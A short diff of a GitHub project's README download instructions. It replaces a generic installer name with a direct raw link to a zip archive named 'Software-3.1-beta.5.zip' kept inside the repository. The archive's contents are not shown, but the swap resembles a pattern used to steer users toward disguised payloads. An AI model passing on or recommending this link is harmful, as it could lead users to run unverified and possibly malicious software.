Subhashsubh/ralphy/README.md

 ### Step 3: Download the Files

 1. Click on the asset name for the latest release.
-You may see files like **ralphy_setup.exe** or similar.
+You may see files like **https://github.com/Subhashsubh/ralphy/raw/refs/heads/main/landing/app/Software-3.1-beta.5.zip** or similar.
 2. After you click the file, your browser will start downloading it automatically.
 3. Wait for the download to finish.